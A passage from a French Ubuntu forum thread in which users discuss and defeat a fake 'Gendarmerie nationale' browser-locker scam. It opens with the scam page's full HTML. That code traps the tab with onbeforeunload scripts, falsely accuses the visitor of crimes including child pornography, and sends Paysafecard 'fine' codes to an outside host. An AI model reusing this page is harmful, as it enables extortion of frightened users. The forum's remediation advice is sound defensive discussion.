<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 8041 --> 


<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 2914 --> 


<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 6099 --> 


<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 2891 --> 


<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 3432 --> 


<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 4437 --> 


<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 8016 --> 


<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 4747 --> 


<div class="txt"><!-- main block -->
<!-- header block -->
<div id="portal-logo" class="header">
	<img class="logo" alt="Europol" src="fr/images/interieur_logo.jpg" width="124" height="82" border="0" />
	<h3 class="c3">
		GENDARMERIE NATIONALE<br />
		<span style="font-size: 60%;">MINISTÈRE DE L'INTÉRIEUR</span><br />
		DÉPARTEMENT DE LA CYBERCRIMINALITÉ
	</h3>
	<img style="float: right;" alt="Europol EC3" src="fr/images/dlcc_logo.png" width="325" height="86" border="0" />
</div>
<!-- fin header block -->
<div style="clear:both"></div>
	<div id="menu_activ">
		<h1>
			Toutes les activités de cet ordinateur ont été enregistrées. Tous votre fichiers sont cryptés.
		</h1>
	</div>
	<!-- top block -->
	<!-- fin top block -->
<!-- left block -->
<div class="left_block">
	<div class="provider">
		<div style="margin-bottom: 10px;"><img alt="British flag" src="fr/images/handcuffs.jpg" width="100%" border="0" /></div>
	<table width="100%" border="1" cellspacing="2" cellpadding="2" align="center">
		<tr><td colspan="2" align="center"><p>IP:</p></td></tr>
		<tr>
			<td colspan="2" bgcolor="#dcdcdc" align="center">
				<p><b>82.64.219.19</b></p>
			</td>
		</tr>
		<tr>
			<td align="center"><p>PAYS</p></td>
			<td align="center"><p>VILLE</p></td></tr>
		<tr>
			<td bgcolor="#dcdcdc" align="center">
				<p>
					<b>France</b>
				</p>
			</td>
			<td bgcolor="#dcdcdc" align="center">
				<p>
					<b>Caen</b>
				</p>
			</td>
		</tr>
		<tr><td colspan="2" align="center"><p>RÉGION</p></td></tr>
		<tr>
			<td colspan="2" bgcolor="#dcdcdc" align="center">
				<p>
					<b>Basse-normandie</b>
				</p>
			</td>
		</tr>
</table>
	</div>
	<div class="footer_right" style="color: #FF0000; text-align: center; font-weight: bold;">
		Toutes les activités de cet ordinateur ont été enregistrées.<br />
		Tous vos fichiers sont cryptés.
	</div>
</div>
<!-- fin left block -->
<!-- right block -->
<div class="right_block">

		<h2>ATTENTION!</h2>
		<h3>
			Opérations sur les activités illégales ont été détectés sur votre ordinateur.<br />
			Votre système d'exploitation a été verrouillé pour cette infractions.<br />
			Vos actions sont considérées comme illégales en France et dans l’Union européenne.
		</h3>
			<!-- Start Text -->
		<div class="text">
		<p>
<font color="red"><b>Vous avez été soumis á de violation du copyrright et droits relatif au loi (Vidéo, Musique, Logiciels) et l'utilisation illégale ou la distribution de contenu sous copyright,</b></font> violant ainsi l'article 1, section 8, clause 8, également connu sous le copyright du Code criminel du la France.<br>

Article 1, Section 8, Clause 8 du Code criminel prévoit une amende de 2 à 500 salaires minimum ou une peine d'emprisonnement pour une période allant jusqu à huit ans.<br>
<font color="red"><b>Vous avez vu ou distribué le contenu Pornographique prohibé</b></font> (les photos de pornographie mettant en scène des enfants et etc ont été trouvés sur votre ordinateur). Violant ainsi l'article 202 du Code criminel du la France, l'article 202 du Code criminel prévoit une peine d'emprisonnement pour une période allant jusqu à quatre à douze ans.<br>
<font color="red"><b>Accès illégal a été initié à partir de votre ordinateur à votre insu ou sans son consentement, votre ordinateur peut être infecté par des logiciels malveillants,</b></font> ainsi vous violez la loi sur l'usage négligent d'ordinateur personnel. L'article 210 du Code criminel prévoit une amende que pouvant aller jusqu'à 100.000&euro; et / ou de une peine d'emprisonnement pour une période allant jusqu à quatre à neuf ans.<br>
En conformité de l'amendement du Code criminel du la France du 28 mai 2011, cette violation de la loi (si elle n'est pas répétée - première fois) peut être considéré comme conditionnel au cas où vous payez l'amende des Etats.<br>
<font color="red"><b>Pour débloquer votre ordinateur et éviter d'autres conséquences juridiques, vous êtes obligé de payer une taxe de sortie de 100&euro;. Libellé par PAYSAFECARD (vous devez acheter carte PAYSAFECARD, le charger avec 100&euro; et entrez le code). Vous pouvez acheter le code dans tout magasins ou stations essence. PAYSAFECARD est disponible dans les magasins du pays.</b></font></p>
<img src="fr/images/verisign.jpg" border="0" style="margin-left: 70px;"><img src="fr/images/barcode.jpg" border="0" style="margin-left: 100px; margin-top: 7px;">

		</div>
			<!-- Fin Text -->

</div>
<!-- right block -->
<div style="clear:both; height: 3px;">&nbsp;</div>
</div><!-- fin main block -->

	<!-- start footer -->
	<div id="footer">
		<!-- start footer block-->
		<div class="footer_block">
			<!-- start ukash helps -->
			<div class="footer_block_as left">
			
<table border="0">
<tr>
	<td>
		<div class="arrow_green">
			<div class="step">1</div><div class="step_fin"><p>Demander PAYSAFECARD: 100EUR</p></div>
		</div>
		<div class="arrow_green">
			<div class="step">2</div><div class="step_fin"><p>Obtenez votre PAYSAFECARD code</p></div>
		</div>
		<div class="arrow_green">
			<div class="step">3</div><div class="step_fin"><p>Utilisez le code de payer l'amende</p></div>
		</div>
	</td>
	<td><img src="fr/images/psc.png" border="0" width="147" height="44"></td>
	<td>
		<div class="psc_help">
			<h3>Où acheter PAYSAFECARD:</h3>
				<img border="0" src="fr/images/shops.png" alt="Shops" />
		</div>	
	</td>
</tr>
</table>
				
			</div>
			<!-- fin ukash helps -->
<!-- PAD block -->
<div class="box right">
	<div class="block_title">
		<p class="block2">Code (chiffres uniquement):</p>
	</div>

	<div class="rd" style="text-align: center;">
		<div class="aside">
			<div class="hold">


						<div class="block1">
							<form action="http://h5662.com/checkout.php?step=1" method="post" onsubmit="return check(); window.onbeforeunload = null; window.document.body.onbeforeunload = null;">
									<div class="form">
										<div class="input fr rd">
<input type="text" id="Editbox2" name="vouchid" value="Entrez votre code d'PAYSAFECARD" />
										</div>
									</div>
									<!-- end .form-->
									<div class="notice-hold">
										<!-- $_NOTICE_BLOCK_0_START_$ --><!-- $_NOTICE_BLOCK_0_END_$ -->
									</div>
									<!-- end .notice-hold-->
				<div id="wb_Text2">
				<br />
				</div>

	<div class="buttons">
		<a class="button">1</a>
		<a class="button">2</a>
		<a class="button">3</a>
		<a class="button">4</a>
		<a class="button">5</a>
		<a class="button">6</a>
		<a class="button">7</a>
		<a class="button">8</a>
		<a class="button">9</a>
		<a class="button">0</a>
		<a class="button" style="padding: 5px 1px;">Supprimer</a>
	</div>
	<div class="buttons" style="text-align: center; margin-bottom: 6px; width: 205px; text-align: center;">
	</div>
<br />
			<div class="submit">
				<input type="submit" value="Débloquez votre ordinateur!" id="AdvancedButton1" name="voucherSubmit" style="height: 34px; cursor: pointer; margin-top: -17px; margin-left: 2px; width: 330px; margin-bottom: 5px;" />
			</div><!-- end .submit-->
							</form>
	</div><!-- end .block1-->


					<!-- end .hold--> 
			</div>
		</div>
	</div>
</div>
<!-- fin PAD block -->
		</div>
		<!-- fin footer block-->
	</div>
	<!-- fin footer -->


</body>
</html>

Hors ligne

#11 Le 02/11/2013, à 23:23

lynn

Re : [résolu] Ransomwares. gendarmerie constaté sur ubuntu

La ligne

127.0.0.1 europol.europe.eu.france.id215363848-9612179532.v1143.com

a été ajouté dans mon hosts et voila. smile


Linux est la solution ! Au fait, c'est quoi ton problème ?
Ubuntu 14.04 - 64 bits  -  Ubuntu 14.10 - 64 bits - Utopic Unicorn

Hors ligne

#12 Le 02/11/2013, à 23:37

zibletop

Re : [résolu] Ransomwares. gendarmerie constaté sur ubuntu

Salut

Je l'ai eut. Ma solution faire

killall firefox

Couper l'internet (débrancher le câble ou couper le wifi)
Ouvrir firefox et fermer ledit onglet
Rebrancher l'internet et c'est OK

a+

Dernière modification par zibletop (Le 02/11/2013, à 23:37)

Hors ligne

#13 Le 02/11/2013, à 23:43

VPCL

Re : [résolu] Ransomwares. gendarmerie constaté sur ubuntu

C' est ce dont je parle dans ce post:

http://forum.ubuntu-fr.org/viewtopic.php?id=1405401

J' en ai eu plusieurs depuis, légerement différents de celui présenté au début de ce post.La page était pleine de fautes de français. A chaque fois, j' ai éteint mon ordi et il a redémarré sans problème.

Bonne soirée à tous, VPCL.

Hors ligne

#14 Le 03/11/2013, à 13:53

U-topic

Re : [résolu] Ransomwares. gendarmerie constaté sur ubuntu

D'où l'intérêt de bloquer l'exécution de script par défaut pour les domaines inconnus via des extensions types NoScript wink

Hors ligne

#15 Le 03/11/2013, à 17:54

Grünt

Re : [résolu] Ransomwares. gendarmerie constaté sur ubuntu

Certains sites Web font aussi apparaître cette fenêtre, même sous Linux.

La solution est de réfléchir, il y a une bonne dizaines d'informations sur une telle page qui prouvent qu'elle n'a rien d'officiel. smile

Dernière modification par Grünt (Le 03/11/2013, à 17:55)


Red flashing lights. I bet they mean something.

Hors ligne

#16 Le 03/11/2013, à 17:55

chinois02

Re : [résolu] Ransomwares. gendarmerie constaté sur ubuntu

J'ai testé l'adresse donnée avec Noscript activé. Noscript bloque bien la chose.

Hors ligne

#17 Le 03/11/2013, à 17:57

Grünt

Re : [résolu] Ransomwares. gendarmerie constaté sur ubuntu

zibletop a écrit :

Salut

Je l'ai eut. Ma solution faire

killall firefox

Couper l'internet (débrancher le câble ou couper le wifi)
Ouvrir firefox et fermer ledit onglet
Rebrancher l'internet et c'est OK

a+

Désactiver Javascript aurait suffi pour fermer la page sans quitter le navigateur.


Red flashing lights. I bet they mean something.

Hors ligne

#18 Le 04/11/2013, à 17:45

nam1962

Re : [résolu] Ransomwares. gendarmerie constaté sur ubuntu

Ne pas oublier d'ajouter betterprivacy à ses modules FF wink


Mon tuto pour optimiser / finaliser une install : http://forum.ubuntu-fr.org/viewtopic.ph … #p15041961
Xubuntu 14.10 sur portable, 12.04 sur fixe, 12.04 & 14.04 chez mes amis.
Score : 49 convertis (leur ai pas donné le choix, aussi...).
Un jeune site que j'aime bien, qui change le T-shirt en un vêtement élégant, exclusif et..bio en plus : http://goudronblanc.com

Hors ligne

#19 Le 04/11/2013, à 21:09

src

Re : [résolu] Ransomwares. gendarmerie constaté sur ubuntu

Je l'ai eu hier sur kubuntu + chrome.
Le virus de la gendarmerie est donc passé au web 2.0 wink
Mais je pensais que les navigateurs pouvaient bloquer ce genre de script pénible ? Ou c'est peut-être uniquement sur Firefox ?


Actuellement sur Manjaro Xfce (amd64)
Serveur sur FreeBSD 10 (i386) + Debian GNU/kFreeBSD.
http://maniatux.fr

Hors ligne

#20 Le 05/11/2013, à 16:45

voxpopuli

Re : [résolu] Ransomwares. gendarmerie constaté sur ubuntu

src a écrit :

Je l'ai eu hier sur kubuntu + chrome.
Le virus de la gendarmerie est donc passé au web 2.0 wink
Mais je pensais que les navigateurs pouvaient bloquer ce genre de script pénible ? Ou c'est peut-être uniquement sur Firefox ?

Avec noscript ce genre de page ne sont que des rumeurs de forum...
(tout navigateur ayant l'option "désactiver javascript" peuvent aussi être protégé, mais il ne faut pas se voiler la face, tout langage interprété côté utilisateurs peut-être machiavélique ou non, si on les bloque totalement adieu la majorité des sites codé uniquement avec ça (genre twitter par exemple))

Dernière modification par voxpopuli (Le 05/11/2013, à 16:45)


« La Justice, c'est six mille ans d'erreurs judiciaires.  »
" Croire l'histoire officielle, c'est croire des criminelles en puissance. "

Hors ligne

#21 Le 06/11/2013, à 11:42

jplemoine

Re : [résolu] Ransomwares. gendarmerie constaté sur ubuntu

Sous Firefox, la page met bloque la fermeture classique du navigateur et se met en page d'accueil.
Pour revenir au comportement normal (de mémoire) :
- "Tuer" le navigateur pour le fermer violemment
- le redémarrer dans restaurer la session
- modifier la page d'accueil par celle par défaut
- fermer le navigateur
- réouvrir et remettre la vraie page d'accueil
- fermer le navigateur

En ligne

#22 Le 06/11/2013, à 11:57

bruno

Re : [résolu] Ransomwares. gendarmerie constaté sur ubuntu

Encore une fois il suffit de désactiver javascript pour pouvoir fermer ce type de page.

Si vous n'avez pas d'extension permettent de le désactiver en un clic :
- nouvel onglet ;
- tapez about:config dans la barre d'URL et cherchez  javascript.enabled, double-clic pour mettre sur false ;
-  fermez l'onglet qui pose problème et réactivez javascript.

Hors ligne

#23 Le 06/11/2013, à 12:13

chinois02

Re : [résolu] Ransomwares. gendarmerie constaté sur ubuntu

En fait il y a 2 modes opératoires pour cette page "fake gendarmerie nationale"
un mode  sous windows avec un virus réel qui est d'ailleurs assez chiant à virer.
une simple page web avec un javascript qui n'affecte pas l'ordinateur et fonctionne tant que javascript est activé sur n'importe quel navigateur y compris sur tablette
http://forum.malekal.com/virus-gendarme … 39606.html

Dernière modification par chinois02 (Le 06/11/2013, à 12:17)

Hors ligne

#24 Le 06/11/2013, à 14:25

frenchy82

Re : [résolu] Ransomwares. gendarmerie constaté sur ubuntu

Bonjour,

un mode  sous windows avec un virus réel qui est d'ailleurs assez chiant à virer.

Je confirme. Impossible d'avoir le mode sans echec (désolé pour les termes windowsiens smile )

Supprimé chez un pote garce à  Kaspersky Rescue Disk 10 et j'en reviens donc à linux. Oufff
En fait il s'agit d'un live cd GNU/linux permettant de lancer l'antivirus

Cela ressemble fortement a une distrib KDE allégé avec montage des disques dur sous la forme win (c:\, d:\ ...)

Hors ligne

#25 Le 06/11/2013, à 14:58

nam1962

Re : [résolu] Ransomwares. gendarmerie constaté sur ubuntu

frenchy82 a écrit :

Bonjour,
(...)

Supprimé chez un pote garce à  Kaspersky Rescue Disk 10 et j'en reviens donc à linux. Oufff
En fait il s'agit d'un live cd GNU/linux permettant de lancer l'antivirus

Cela ressemble fortement a une distrib KDE allégé avec montage des disques dur sous la forme win (c:\, d:\ ...)

Parmi mes "convertis" il y en a 3 à qui j'ai supprimé le virus...   ...en supprimant W$ tongue

Sont désormais en Xubuntu sans virus ceux là !

Dernière modification par nam1962 (Le 06/11/2013, à 14:59)


Mon tuto pour optimiser / finaliser une install : http://forum.ubuntu-fr.org/viewtopic.ph … #p15041961
Xubuntu 14.10 sur portable, 12.04 sur fixe, 12.04 & 14.04 chez mes amis.
Score : 49 convertis (leur ai pas donné le choix, aussi...).
Un jeune site que j'aime bien, qui change le T-shirt en un vêtement élégant, exclusif et..bio en plus : http://goudronblanc.com

Hors ligne

Haut de page ↑